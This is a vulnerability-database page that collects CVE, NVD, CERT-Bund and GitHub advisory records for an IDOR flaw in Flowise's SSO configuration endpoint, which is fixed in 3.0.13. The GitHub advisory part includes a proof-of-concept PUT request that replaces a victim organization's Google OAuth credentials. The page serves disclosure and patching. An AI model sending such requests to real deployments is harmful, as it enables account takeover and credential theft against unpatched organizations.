Vulnerability-Lookup

CVE-2026-30823 (GCVE-0-2026-30823)

Vulnerability from cvelistv5 – Published: 2026-03-07 05:10 – Updated: 2026-03-09 20:44

Title

Flowise: IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration

Summary

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.

Severity ?

8.8 (High)


                        
                          CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key
CWE-862 - Missing Authorization

Assigner

GitHub_M

References

URL

Tags

	https://github.com/FlowiseAI/Flowise/security/adv…	x_refsource_CONFIRM
	https://github.com/FlowiseAI/Flowise/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	FlowiseAI	Flowise	Affected: < 3.0.13

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-30823",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-09T20:34:04.126274Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-09T20:44:24.602Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Flowise",
          "vendor": "FlowiseAI",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.0.13"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639: Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-07T05:10:08.035Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
        },
        {
          "name": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
        }
      ],
      "source": {
        "advisory": "GHSA-cwc3-p92j-g7qm",
        "discovery": "UNKNOWN"
      },
      "title": "Flowise: IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-30823",
    "datePublished": "2026-03-07T05:10:08.035Z",
    "dateReserved": "2026-03-05T21:06:44.605Z",
    "dateUpdated": "2026-03-09T20:44:24.602Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-30823\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-07T06:16:10.007\",\"lastModified\":\"2026-03-09T13:35:34.633\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.\"},{\"lang\":\"es\",\"value\":\"Flowise es una interfaz de usuario de arrastrar y soltar para construir un flujo de modelo de lenguaje grande personalizado. Antes de la versi\u00f3n 3.0.13, existe una vulnerabilidad IDOR, que conduce a la toma de control de cuentas y a la elusi\u00f3n de funciones empresariales a trav\u00e9s de la configuraci\u00f3n de SSO. Este problema ha sido parcheado en la versi\u00f3n 3.0.13.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"},{\"lang\":\"en\",\"value\":\"CWE-862\"}]}],\"references\":[{\"url\":\"https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30823\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-09T20:34:04.126274Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-09T20:35:38.393Z\"}}], \"cna\": {\"title\": \"Flowise: IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration\", \"source\": {\"advisory\": \"GHSA-cwc3-p92j-g7qm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_0\": {\"scope\": \"UNCHANGED\", \"version\": \"3.0\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"FlowiseAI\", \"product\": \"Flowise\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.0.13\"}]}], \"references\": [{\"url\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm\", \"name\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13\", \"name\": \"https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639: Authorization Bypass Through User-Controlled Key\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-862\", \"description\": \"CWE-862: Missing Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-07T05:10:08.035Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-30823\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-09T20:44:24.602Z\", \"dateReserved\": \"2026-03-05T21:06:44.605Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-07T05:10:08.035Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-30823

Vulnerability from fkie_nvd - Published: 2026-03-07 06:16 - Updated: 2026-03-09 13:35

Severity ?

8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
	security-advisories@github.com	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13."
    }
  ],
  "id": "CVE-2026-30823",
  "lastModified": "2026-03-09T13:35:34.633",
  "metrics": {
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-07T06:16:10.007",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-639"
        },
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

WID-SEC-W-2026-0626

Vulnerability from csaf_certbund - Published: 2026-03-05 23:00 - Updated: 2026-03-08 23:00

Summary

Flowise: Mehrere Schwachstellen

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

Flowise ist eine Benutzeroberfläche zur Erstellung von LLMs (Large Language Model).

Angriff

Ein Angreifer kann mehrere Schwachstellen in Flowise ausnutzen, um sich erweiterte Berechtigungen zu verschaffen, Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren und vertrauliche Informationen offenzulegen.

Betroffene Betriebssysteme

- Sonstiges - UNIX

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "hoch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Flowise ist eine Benutzeroberfl\u00e4che zur Erstellung von LLMs (Large Language Model).",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein Angreifer kann mehrere Schwachstellen in Flowise ausnutzen, um sich erweiterte Berechtigungen zu verschaffen, Sicherheitsma\u00dfnahmen zu umgehen, Daten zu manipulieren und vertrauliche Informationen offenzulegen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Sonstiges\n- UNIX",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2026-0626 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0626.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2026-0626 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0626"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j8g8-j7fc-43v6"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jc5m-wrp2-qq38"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-mq4r-h2gh-qv7x"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq"
      },
      {
        "category": "external",
        "summary": "Flowise GitHub vom 2026-03-05",
        "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp"
      }
    ],
    "source_lang": "en-US",
    "title": "Flowise: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2026-03-08T23:00:00.000+00:00",
      "generator": {
        "date": "2026-03-09T08:11:51.241+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.5.0"
        }
      },
      "id": "WID-SEC-W-2026-0626",
      "initial_release_date": "2026-03-05T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2026-03-05T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2026-03-08T23:00:00.000+00:00",
          "number": "2",
          "summary": "Referenz(en) aufgenommen: EUVD-2026-10111, EUVD-2026-10110, EUVD-2026-10109, EUVD-2026-10108, EUVD-2026-10107"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c3.0.13",
                "product": {
                  "name": "Open Source Flowise \u003c3.0.13",
                  "product_id": "T051470"
                }
              },
              {
                "category": "product_version",
                "name": "3.0.13",
                "product": {
                  "name": "Open Source Flowise 3.0.13",
                  "product_id": "T051470-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:flowiseai:flowise:3.0.13"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Flowise"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-30820",
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-30820"
    },
    {
      "cve": "CVE-2026-30821",
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-30821"
    },
    {
      "cve": "CVE-2026-30822",
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-30822"
    },
    {
      "cve": "CVE-2026-30823",
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-30823"
    },
    {
      "cve": "CVE-2026-30824",
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00",
      "title": "CVE-2026-30824"
    },
    {
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00"
    },
    {
      "product_status": {
        "known_affected": [
          "T051470"
        ]
      },
      "release_date": "2026-03-05T23:00:00.000+00:00"
    }
  ]
}

GHSA-CWC3-P92J-G7QM

Vulnerability from github – Published: 2026-03-06 22:20 – Updated: 2026-03-09 13:15

Summary

Flowise has IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration

Details

Summary

The Flowise platform has a critical Insecure Direct Object Reference (IDOR) vulnerability combined with a Business Logic Flaw in the PUT /api/v1/loginmethod endpoint.

While the endpoint requires authentication, it fails to validate if the authenticated user has ownership or administrative rights over the target organizationId. This allows any low-privileged user (including "Free" plan users) to:

Overwrite the SSO configuration of any other organization.
Enable "Enterprise-only" features (SSO/SAML) without a license.
Perform Account Takeover by redirecting the authentication flow.

Details

The backend accepts the organizationId parameter from the JSON body and updates the database record corresponding to that ID. There is no middleware or logic check to ensure request.user.organizationId === body.organizationId.

PoC

Prerequisites: 1. The attacker creates a standard "Free" account and obtains a valid JWT token (Cookie/Header). 2. The attacker identifies the target organizationId (e.g., bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d).

Step-by-Step Exploitation: The attacker sends the following PUT request to overwrite the victim's Google SSO configuration.

Request:

PUT /api/v1/loginmethod HTTP/2
Host: cloud.flowiseai.com
Cookie: token=<ATTACKER_JWT_TOKEN>
Content-Type: application/json
Accept: application/json

{
  "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
  "userId": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", 
  "providers": [
    {
      "providerLabel": "Google",
      "providerName": "google",
      "config": {
        "clientID": "ATTACKER_MALICIOUS_CLIENT_ID",
        "clientSecret": "ATTACKER_MALICIOUS_SECRET"
      },
      "status": "enable"
    }
  ]
}

Response: The server responds with 200 OK, confirming the modification has been applied to the victim's organization context.

{
  "status": "OK",
  "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d"
}

Impact

Account Takeover: An attacker can replace a victim organization's legitimate OAuth credentials (e.g., Google Client ID) with their own malicious application credentials. When victim employees try to log in via SSO, they are authenticated against the attacker's application, potentially allowing the attacker to hijack sessions or steal credentials.
License Control Bypass: Users on the "Free" tier can illicitly enable and configure SSO providers (Azure, Okta, etc.), which are features strictly restricted to the "Enterprise" plan.

Severity ?

8.8 (High)


                  
                    CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.12"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30823"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-06T22:20:50Z",
    "nvd_published_at": "2026-03-07T06:16:10Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe Flowise platform has a critical Insecure Direct Object Reference (IDOR) vulnerability combined with a Business Logic Flaw in the PUT /api/v1/loginmethod endpoint.\n\nWhile the endpoint requires authentication, it fails to validate if the authenticated user has ownership or administrative rights over the target organizationId. This allows any low-privileged user (including \"Free\" plan users) to:\n\n1. Overwrite the SSO configuration of any other organization.\n2. Enable \"Enterprise-only\" features (SSO/SAML) without a license.\n3. Perform Account Takeover  by redirecting the authentication flow.\n\n### Details\nThe backend accepts the organizationId parameter from the JSON body and updates the database record corresponding to that ID. There is no middleware or logic check to ensure request.user.organizationId === body.organizationId.\n\n### PoC\nPrerequisites:\n1. The attacker creates a standard \"Free\" account and obtains a valid JWT token (Cookie/Header).\n2. The attacker identifies the target organizationId (e.g., bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d).\n\n**Step-by-Step Exploitation**: The attacker sends the following PUT request to overwrite the victim\u0027s Google SSO configuration.\n\n**Request**:\n\n```http\nPUT /api/v1/loginmethod HTTP/2\nHost: cloud.flowiseai.com\nCookie: token=\u003cATTACKER_JWT_TOKEN\u003e\nContent-Type: application/json\nAccept: application/json\n\n{\n  \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n  \"userId\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\", \n  \"providers\": [\n    {\n      \"providerLabel\": \"Google\",\n      \"providerName\": \"google\",\n      \"config\": {\n        \"clientID\": \"ATTACKER_MALICIOUS_CLIENT_ID\",\n        \"clientSecret\": \"ATTACKER_MALICIOUS_SECRET\"\n      },\n      \"status\": \"enable\"\n    }\n  ]\n}\n```\n\n**Response**: The server responds with 200 OK, confirming the modification has been applied to the victim\u0027s organization context.\n\n```json\n{\n  \"status\": \"OK\",\n  \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\"\n}\n```\n\n### Impact\n\n- **Account Takeover**: An attacker can replace a victim organization\u0027s legitimate OAuth credentials (e.g., Google Client ID) with their own malicious application credentials. When victim employees try to log in via SSO, they are authenticated against the attacker\u0027s application, potentially allowing the attacker to hijack sessions or steal credentials.\n- **License Control Bypass**: Users on the \"Free\" tier can illicitly enable and configure SSO providers (Azure, Okta, etc.), which are features strictly restricted to the \"Enterprise\" plan.",
  "id": "GHSA-cwc3-p92j-g7qm",
  "modified": "2026-03-09T13:15:47Z",
  "published": "2026-03-06T22:20:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-cwc3-p92j-g7qm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30823"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise has IDOR leading to Account Takeover and Enterprise Feature Bypass via SSO Configuration"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-30823 (GCVE-0-2026-30823)

FKIE_CVE-2026-30823

WID-SEC-W-2026-0626

GHSA-CWC3-P92J-G7QM

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature